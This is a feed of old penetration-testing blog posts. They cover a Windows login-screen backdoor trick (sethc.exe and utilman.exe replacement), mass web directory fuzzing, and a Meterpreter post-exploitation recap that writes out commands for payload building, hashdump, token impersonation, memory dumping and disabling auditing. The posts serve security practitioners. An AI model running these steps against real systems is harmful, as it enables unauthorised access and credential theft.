<div>Next version will add some requested features like multiple proxies support, delay between request, and many more. </div><div><br />
</div><div><br />
</div><div><div>Stay tuned and enjoy...</div><div><br />
</div><div>Christian</div></div>http://edge-security.blogspot.com/2010/07/owasp-vi-spain-meeting-2010-and-still.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-2835781447424084363Fri, 14 May 2010 21:46:00 +00002011-06-21T23:19:28.201+01:00bruteforceweb securitywebappswfuzzMassive Web Application discovery with Wfuzz<div style="text-align: justify;">Last week i had to review like 40 websites for a penetration test in a short period of time, so the first thing i wanted was to search for directories or files in the web servers, so how can i automate the full scan with Wfuzz? We can use a command like this:</div><div><br /></div><div><span class="Apple-style-span" >$ wfuzz -c -z file -f urllist.txt,dictionary.txt --html --hc 404 http://FUZZ/FUZ2Z 2> results.html</span></div><div><br /></div><div style="text-align: justify;"> The first FUZZ will be replaced with the content of urllist.txt, where you should have the websites address in the format "www.target.com", and the second FUZ2Z will be replaced with the dictionary, in my case i used the big.txt.</div><div><br /></div><div>Soon i will release an update of Webslayer, and will show how to do this with it.</div><div><br /></div><div>Enjoy!</div><div><br /></div><div>Laramies</div>http://edge-security.blogspot.com/2010/05/massive-web-application-discovery-with.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-1852307224273391567Mon, 11 Jan 2010 23:05:00 +00002011-06-21T23:19:28.201+01:00ezinesincident responseSecurity Ezines 2010Hi all, in this brief post i will like to share some new ezines about security that were relased this year, the first one is called <a href="http://intotheboxes.wordpress.com/">Into the Boxes</a>, and it's centered in Forensics and Incident response, it's a join effort from <a href="http://windowsir.blogspot.com">Harlan Carvey</a> and <a href="http://www.cutawaysecurity.com/blog/">Don</a> (securityripcord), this ezine looks promising. You can download the first issue <a href="http://intotheboxes.files.wordpress.com/2009/12/intotheboxes_q12009.pdf">here</a>.<div><br /></div><div>The other ezine is the one launched by <a href="http://www.hackinthebox.org/">Hack In the Box </a>(HitB), this magazine has a very professional look and a lot of articles, can be compared with a Hakin9 magazine, but free. They relaunched the ezine this year. You can download the first issue <a href="https://www.hackinthebox.org/misc/HITB-Ezine-Issue-001.pdf">here</a>.</div><div><br /></div><div>It's cool to see fresh initiatives for sharing knowledge :)</div><div><br /></div><div>I would like to see a Kindle version of them ;)</div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div>http://edge-security.blogspot.com/2010/01/security-ezines-2010.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-8042731498341227670Mon, 09 Nov 2009 23:08:00 +00002011-06-21T23:19:28.202+01:00bypasshackingsticky keysutilmanwindows 7Owning Windows 7 - Double hack (physical access required)<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Hi all, i finished my Windows 7 upgrade and i decided to check and old trick that worked on XP and <a href="http://laramies.blogspot.com/2008/05/windos-vista-easy-hack.html">Vista</a>, no foo required, it's an easy one:</div><div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">If you have access to a Windows 7 Box, you can still replace the binary c:\windows\system32\<b>sethc.exe</b> by your favourite backdoor (you can insert the <a href="http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html">same binary with the meterpreter embedded</a>) and trigger it pressing 5 times the shift key on the login screen. Also the trick works by replacing c:\windows\system32\<b>utilman.ex</b>e, and pressing WIN-U in the login screen. (you must boot with a live CD in order to replace the binaries)</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">I know, i know.. if someone have access to your machine it's game over, but hey this it's still there and this could have been improved and avoid the direct calling of two binaries by a key combination.</div><div><br /></div><div>You can see the double cmd.exe popping one for sethc.exe and the other for utilman.exe, both with "<b>nt authority\system</b>" privileges.</div><div><br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 290px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr4o8VtJPhZHsn_1spg51kWC76G1EptQDP9EhixvbqZEyyYeEIIIVWI3AVgMWd1yiYmWKgw21oha5Lw4Cu7RAG4hlPSnDhxACCrXvk6pzJxB77h1Hvc7X5hnL2-t99QWPs6oP39UJo3AGi/s320/windows7-tricks.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5402247076452360850" /></div><div style="text-align: center;"><br /></div><div style="text-align: left;">If you don't have your disk encrypted you should do it... if you have it encrypted, beware with the <a href="http://theinvisiblethings.blogspot.com/2009/10/evil-maid-goes-after-truecrypt.html">Evil Maid</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Enjoy,</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Christian</div></div>http://edge-security.blogspot.com/2009/11/owning-windows-7-double-hack-physical.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-7179794826093444082Fri, 08 May 2009 16:42:00 +00002011-06-21T23:19:28.202+01:00incidentOraclesql injectionPangolin and your data<div style="text-align: justify;">This will be a brief entry about a dubious behavior of Pangolin (SQL Injection Tool). Today we were checking some of the features of Pangolin, and i had special interest on the ORACLE UTL_HTPP injection, i checked the options and there wasn't a configuration for the local HTTP server, so i was wondering how the hell they got the results back.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">So i started Pangolin against a test server, and there wasn't any open port in my machine, next step my coworker Javi, launched the attack and sniffed the traffic, all the injection was urlencoded+Oracle (char) encoding, after decoding we found that the results of the injection is sent to a nosec.org web server, and then Pangolin perform a GET to retrieve the data. WTH?</div><div><br /></div><div>At least let the user know what are you doing with the data, i don't think this will make penetration testers happy, knowing that they customers data is traveling via a third party server.</div><div><br /></div><div>Be careful where you send your data ;)</div><div><br /></div><div>-CMM</div>http://edge-security.blogspot.com/2009/05/pangolin-and-your-data.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-5465652625030249413Tue, 28 Apr 2009 20:28:00 +00002011-06-21T23:19:28.202+01:00deliciousinformation gatheringPenetration testInformation Gathering: Delicious<div style="text-align: right;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijX-NjEK4jtVy3MIuav42briRBGnNHfgWmV7brCHaoCBF7KgbWVNONYvgrxLUW5-Tokr2jjKlVig_kus3vJajxfbXukhlq8WjOS457Cpp4OUOenfUMUIA7mkvFiMn7kf4PTdpOAskglPTZ/s1600-h/delicious_logo.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 243px; height: 72px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijX-NjEK4jtVy3MIuav42briRBGnNHfgWmV7brCHaoCBF7KgbWVNONYvgrxLUW5-Tokr2jjKlVig_kus3vJajxfbXukhlq8WjOS457Cpp4OUOenfUMUIA7mkvFiMn7kf4PTdpOAskglPTZ/s320/delicious_logo.png" alt="" id="BLOGGER_PHOTO_ID_5329856516410771922" border="0" /></a><br /></div>Here is a new source that could help you during a Penetration Test, it's not a source that will give you results most of the times, but hey! maybe you are lucky.<br /><br />Delicious is a service for keeping your bookmarks in one place (online), it's social bookmarking.<br /><br />So let's go with an example; if you have some nicknames from your target, you can search directly on their Delicious profile, all their public links, for example my profile:<br /><br /><span style="font-family:times new roman;">http://delicious.com/laramies</span><br /><br />Remember that users can mark a link as private, but here is where we can be lucky if they forget to save it as private.<br /><br />Another way of searching in Delicious, is using target company URL's or IP's, in this example i will use just a standard internal ip:<br /><br /><span style="font-family:times new roman;">192.168.1.1</span><br /><br />And look the second result:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgptupaqrAGGBqc0UG4PYy7HiL5shR5L8ZIpFF9WKeRPs0RYiAWl8UONOI-m2BRkuhTEyp9WLpj6HxLGJpsMEuzvc4GWKog1TeL6jnG-63XfR7WdFGHUeZYOgF1P5CaCkXoRfkQH7UOzN7Z/s1600-h/delicious.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 310px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgptupaqrAGGBqc0UG4PYy7HiL5shR5L8ZIpFF9WKeRPs0RYiAWl8UONOI-m2BRkuhTEyp9WLpj6HxLGJpsMEuzvc4GWKog1TeL6jnG-63XfR7WdFGHUeZYOgF1P5CaCkXoRfkQH7UOzN7Z/s320/delicious.png" alt="" id="BLOGGER_PHOTO_ID_5329849504515667298" border="0" /></a><br />The root password in the url :)<br /><br />In particular cases you can obtain interesting results<br /><br />-CMMhttp://edge-security.blogspot.com/2009/04/information-gathering-delicious.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-6496779188974837388Tue, 28 Apr 2009 20:00:00 +00002011-06-21T23:19:28.202+01:00proxystriketoolswebappsProxyStrike Plugins updateWell this is a short post, just to let you know that the plugins framework of ProxyStrike is updated, making easier to develop your own plugins. Here is a diagram of the internal structure:<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvHRLbKr2IaId7Oi_Shfrmz6ppOf6XDG7yyCdwq8apPH88rjz60EBXaYR-eI8JLim7mvxmnAzVCliZlAEYIXQHW6ypIUS2GqEggPzo7H1y-JyJF6EDmK2k4oafVt-QNgOuulgU_-zIm-I/s1600/struct.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 471px; height: 335px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvHRLbKr2IaId7Oi_Shfrmz6ppOf6XDG7yyCdwq8apPH88rjz60EBXaYR-eI8JLim7mvxmnAzVCliZlAEYIXQHW6ypIUS2GqEggPzo7H1y-JyJF6EDmK2k4oafVt-QNgOuulgU_-zIm-I/s1600/struct.png" alt="" border="0" /></a>Now each plugin is a file, and here is an example of a plugin for gathering all the email addresses:<br /><br /><pre class="prettyprint" style="font-family:times new roman;"><span style="font-size:85%;"><span class="kwd">class</span><span class="pln"> email_detect</span><span class="pun">(</span><span class="typ">AttackPlugin</span><span class="pun">):</span><span class="pln"><br /> </span><span class="kwd">def</span><span class="pln"> __init__</span><span class="pun">(</span><span class="kwd">self</span><span class="pun">):</span><span class="pln"><br /> </span><span class="typ">AttackPlugin</span><span class="pun">.</span><span class="pln">__init__</span><span class="pun">(</span><span class="kwd">self</span><span class="pun">,</span><span class="pln">name</span><span class="pun">=</span><span class="str">"email detect"</span><span class="pun">,</span><span class="pln">variableSet</span><span class="pun">=</span><span class="kwd">False</span><span class="pun">,</span><span class="pln">iface</span><span class="pun">=</span><span class="kwd">True</span><span class="pun">,</span><span class="pln">type</span><span class="pun">=</span><span class="str">"tree"</span><span class="pun">,</span><span class="pln">fields</span><span class="pun">=[</span><span class="str">"Url"</span><span class="pun">,</span><span class="str">"Email"</span><span class="pun">])</span><span class="pln"><br /><br /> </span><span class="kwd">self</span><span class="pun">.</span><span class="pln">emailre</span><span class="pun">=</span><span class="pln">re</span><span class="pun">.</span><span class="pln">compile</span><span class="pun">(</span><span class="str">"[a-z0-9_.-]+@[a-z0-9_.-]+"</span><span class="pun">,</span><span class="pln">re</span><span class="pun">.</span><span class="pln">I</span><span class="pun">)</span><span class="pln"><br /><br /> </span><span class="kwd">def</span><span class="pln"> process</span><span class="pun">(</span><span class="kwd">self</span><span class="pun">,</span><span class="pln">req</span><span class="pun">):</span><span class="pln"><br /> html</span><span class="pun">=</span><span class="pln">req</span><span class="pun">.</span><span class="pln">response</span><span class="pun">.</span><span class="pln">getContent</span><span class="pun">()</span><span class="pln"><br /> a</span><span class="pun">=</span><span class="kwd">self</span><span class="pun">.</span><span class="pln">emailre</span><span class="pun">.</span><span class="pln">findall</span><span class="pun">(</span><span class="pln">html</span><span class="pun">)</span><span class="pln"><br /> results</span><span class="pun">=[]</span><span class="pln"><br /> </span><span class="kwd">for</span><span class="pln"> i </span><span class="kwd">in</span><span class="pln"> a</span><span class="pun">:</span><span class="pln"><br /> results</span><span class="pun">.</span><span class="pln">append</span><span class="pun">([</span><span class="pln">i</span><span class="pun">])</span><span class="pln"><br /> </span><span class="kwd">if</span><span class="pln"> a</span><span class="pun">:</span><span class="pln"> <br /> </span><span class="kwd">self</span><span class="pun">.</span><span class="pln">putRESULTS</span><span class="pun">([</span><span class="pln">req</span><span class="pun">.</span><span class="pln">completeUrl</span><span class="pun">,</span><span class="pln">results</span><span class="pun">])</span><span class="pln"><br /><br /><br /></span></span></pre> You can find more examples inside the plugin folder, just get your copy via subversion:<br /><br /> <span style="font-size:85%;"><tt id="checkoutcmd">svn checkout <strong><em>http</em></strong>://proxystrike.googlecode.com/svn/trunk/ proxystrike-read-only</tt></span> <br /><br />More information in the <a href="http://code.google.com/p/proxystrike/w/list">wiki</a>, and you can follow updates by deepbit in his new <a href="http://deesec.com/">blog</a><br /><br />Enjoy<br /><br />-CMMhttp://edge-security.blogspot.com/2009/04/proxystrike-plugins-update.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-917741716155298066Mon, 20 Apr 2009 20:00:00 +00002011-06-21T23:19:28.202+01:00metasploitmeterpreterpostexploitationMeterpreter Post exploitation - Recap<div style="text-align: justify;"><br /></div><div style="text-align: justify;">I have been a big fan of Meterpreter since it first version, now i would like to review the different cool things and plugins that are around for this feature of Metasploit, that covers the post-exploitation phase. As explained in the first <a href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf">Meterpreter paper</a>:</div><div style="text-align: justify;"><br /></div><div><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 10.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"></span></span></p><span class="Apple-style-span" style="font-family:georgia;"><blockquote><p style="text-align: justify;margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 10px/normal Helvetica; "><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">Meterpreter, short for</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> </span></span></span><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">The Meta-Interpreter, is an advanced payload </span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"><span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">that is included in the Metasploit Framework. <span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">Its purpose is to provide complex</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> <span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">and advanced features that would otherwise be tedious to implement purely</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> <span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">in assembly. The way that it accomplishes this is by allowing developers to</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> <span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">write their own extensions in the form of shared ob ject (DLL) files that can</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> <span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">be uploaded and injected into a running process on a target computer after</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> <span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">exploitation has occurred. Meterpreter and all of the extensions that it loads</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> <span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">are executed entirely from memory and never touch the disk, thus allowing them</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> <span class="Apple-style-span" style=" ;font-family:Helvetica;font-size:10px;"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;">to execute under the radar of standard Anti-Virus detection.</span></span><span style="font: 12.0px Helvetica"><span class="Apple-style-span" style="font-family:georgia;"><span class="Apple-style-span" style="font-size:medium;"> </span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></p></blockquote></span><p></p><div style="text-align: justify;"><br /></div><div style="text-align: justify;">First of all, i would like to remark that i use <a href="http://laramies.blogspot.com/2005/10/using-meterpreter-as-standalone.html">Meterpreter as a standalone</a> binary most of the times. To create a binary for uploading to a server you can use this command:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe</span></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E</span></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Or inside the metasploit console:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="color:#009900;">msf > use exploit/multi/handler</span></div><div style="text-align: justify;"><span class="Apple-style-span" style="color:#009900;">msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp</span></div><div style="text-align: justify;"><span class="Apple-style-span" style="color:#009900;">msf exploit(handler)> set LPORT 443</span></div><div style="text-align: justify;"><span class="Apple-style-span" style="color:#009900;">msf exploit(handler)> exploit</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Well once we have a working connection, these are some things that you can do:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>-Port forwarding: You can make port redirections, </b></div><div style="text-align: justify;"><b><br /></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389</span></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">-L = ip that will hold the listening port</div><div style="text-align: justify;">-l = the listening port </div><div style="text-align: justify;">-h = the target host</div><div style="text-align: justify;">-p = the target port</div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-weight: normal; "><br /></span></b></div><div style="text-align: justify;">Now you should connect to the exploited machine on port 444</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">More on forwarding and routing <a href="http://hkashfi.blogspot.com/2008/04/bypassing-firewalls-with-port.html">here</a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>-HashDumps:</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b></b>You can get the hashes of the user accounts, like the pwdump utility, for later cracking.</div><div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="color:#009900;">meterpreter> use privs (we load the privileges module)</span></div><div style="text-align: justify;"><span class="Apple-style-span" style="color:#009900;">meterpreter> hashdump</span></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">You need Admin/System privileges to work.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>-User impersonation, using the token passing technique:</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';">You can use meterpreter for performing the "pass the token" attack to impersonate another user, introduced by <a href="http://sourceforge.net/projects/incognito">Luke Jennings</a>:</span></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><br /></span></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">meterpreter> use incognito (we load the incognito module)</span></span></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">meterpreter> list_tokens (we list all available sessions)</span></span></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">meterpreter> impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)</span></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">You need Admin/System privileges to work.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">If you want to revert the situation an obtain your original session, you can execute:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">meterpreter> rev2self</span></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">More on working with Incognito and Meterpreter at <a href="http://carnal0wnage.blogspot.com/2009/04/more-on-working-with-incognito-and.html">Carnal0wnage</a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Dumping memory to extract hashes</b> (using mdd.exe): </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Here we first need to upload mdd.exe<a href="http://www.mantech.com/msma/MDD.asp"> (Mantech)</a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">meterpreter> upload mdd.exe .</span></span></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">meterpreter> execute -f mdd.exe -a "-o mydump.dd"</span></span></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family:'times new roman';"><span class="Apple-style-span" style="color:#009900;">meterpreter> download mydump.dd .</span></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Now we need can use volatility to:</div><div style="text-align: justify;"><br /></div><div><div style="text-align: justify;"><ul><li>cachedump Dump (decrypted) domain hashes from the registry</li><li>hashdump Dump (decrypted) LM and NT hashes from the registry</li><li>hivelist Print list of registry hives</li><li>hivescan Scan for _CMHIVE objects (registry hives)</li><li>lsadump Dump (decrypted) LSA secrets from the registry</li></ul></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">More information on using meterpreter + mdd + volatility on <a href="http://blog.attackresearch.com/?q=node/24">Attack Research</a> blog</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Another resource for Meterpreter plugins is the <a href="http://www.darkoperator.com/">DarkOperator</a> website, where we can find some modules like:</div><div style="text-align: justify;"><br /></div><div><ul><li style="text-align: justify;">Disable_Audit: Disable auditing, by changing the local security policy</li></ul><ul><li style="text-align: justify;">GetGui: Script for enabling RDP service on target host.</li></ul><ul><li style="text-align: justify;">GetTelnet: this script will enable the Telnet Service on Win2003 and XP, and will install it on Vista and 2008.</li></ul><ul><li style="text-align: justify;">Memdump: Automation for mdd</li></ul><ul><li style="text-align: justify;">WinEnum: Script that will gather a big amount of information about the host</li></ul><ul><li style="text-align: justify;">Scheduleme: this will allow for task scheduling on target host. Will run the commands as System.</li></ul><ul><li style="text-align: justify;">NetEnum: Performs network enumeration, ping sweeps, reverse dns lookups, etc.</li></ul><ul><li style="text-align: justify;">Soundrecorder: Allows you to record sound on the target machine :)</li></ul><ul><li style="text-align: justify;">GetCounterMeasure: this script will identify antivirus,HIPS,HIDS, Firewalls, etc.</li></ul><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;">You can find examples of these modules and the source code in the the <a href="http://www.darkoperator.com/">Darkoperator</a> website under the <a href="http://www.darkoperator.com/meterpreter/">meterpreter</a> zone, many of them are included in the <a href="http://www.metasploit.com/">Metasploit</a> project.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Meterpreter service wrapper:</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">You can use Metsvc to run meterpreter as a Windows service, or as a command line application. You have to download from <a href="http://www.phreedom.org/software/metsvc/">Phreedom.org</a> (Alexander Sotirov)</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="color:#009900;">c:> metsvc.exe install-service (it will launch on port 31337)</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Well that's all for now, i will like to thanks <a href="http://carnal0wnage.blogspot.com/">Chris Gates</a> and Carlos Perez (<a href="http://www.darkoperator.com/">DarkOperator</a>) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Also a big thanks for all the Metasploit team, for their great work.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"> </div><div style="text-align: justify;">Enjoy your post exploitation ...</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">-CMM</div><div><br /></div></div>http://edge-security.blogspot.com/2009/04/meterpreter-post-exploitation-recap.html[email protected] (Christian Martorella)1
- tag:blogger.com,1999:blog-6921014549873020749.post-1392628847706889991Sat, 11 Apr 2009 10:16:00 +00002011-06-21T23:19:28.202+01:00metasploitOracleFrom Oracle to the OS with Metasploit<div style="text-align: justify;">I'm back from my vacations, and it's time write some new posts</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">I read an interesting article on how to obtain a shell through Oracle Database, this article was written by Alexandr Polyakov from <a href="http://www.dsecrg.com">www.dsecrg.com</a>, they have more interesting things about Oracle penetration testing on their website.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The article explains how to obtain an OS shell, via Pass the hash technique inside Oracle, using only an account with the CONNECT and RESOURCE privileges. The idea is to read a file over the network via SMB (ctxsys.context) and connect to a fake SMB server to steal the NTLM challenge-response.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The author explains the creation of a Metasploit plugin (<a href="http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb?rev=6469">ora_ntlm_stealer</a>) to automate the process, so you can get it by updating your svn copy.</div><div><br /></div><div>Here is the <a href="http://www.dsecrg.com/pages/pub/show.php?id=17">paper</a> with the complete information</div><div><br /></div><div>Enjoy</div><div><br /></div><div>-CMM</div>http://edge-security.blogspot.com/2009/04/from-oracle-to-os-with-metasploit.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-2118236824134437000Tue, 17 Mar 2009 22:55:00 +00002011-06-21T23:19:28.203+01:00proxyproxystriketoolswebappsProxyStrike v2.0 released!<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3411/3251415324_242d45c681.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 108px;" src="http://farm4.static.flickr.com/3411/3251415324_242d45c681.jpg" border="0" alt="" /></a><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3411/3251415324_242d45c681.jpg"></a><p style="text-align: justify;margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 12px/normal Helvetica; "></p><div>I'm pleased to announce a new version of ProxyStrike, an active Web Application Proxy, a tool designed to find vulnerabilities while browsing an application. It was created because the problems we faced in the pentests of web applications that heavily depends on Javascript, not many web scanners did it good at this stage, so we came with this proxy.</div><div><br /></div><div>Right now it has available Sql injection, XSS and Server side includes.</div><div><br /></div><div>Highlights from this release:</div><div> • Plugin engine (Create your own plugins!)</div><div> • Automatic crawl process</div><div><br /></div><div> • Request interceptor</div><div> • Request diffing</div><div> • Request repeater</div><div> • Save/restore session</div><div> • Http request/response history</div><div> • Request parameter stats</div><div> • Request parameter values stats</div><div> • Request url parameter signing and header field signing</div><div> • Use of an alternate proxy (tor for example ;D )</div><div> • Attack logs</div><div> • Export results to HTML or XML</div><div> * Sql attacks (plugin)</div><div> • Server Side Includes (plugin)</div><div> • Xss attacks (plugin)</div><div><br /></div><div>Check it at: http://www.edge-security.com/proxystrike.php</div><div><br /></div><div>Here is a video of the tool:</div><p></p><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px"><br /></p><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px"><span class="Apple-style-span" style=" white-space: pre; font-family:Arial;font-size:10px;"><object width="480" height="295"><param name="movie" value="http://www.youtube.com/v/l8kioy4QX7U&hl=en&fs=1"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/l8kioy4QX7U&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" 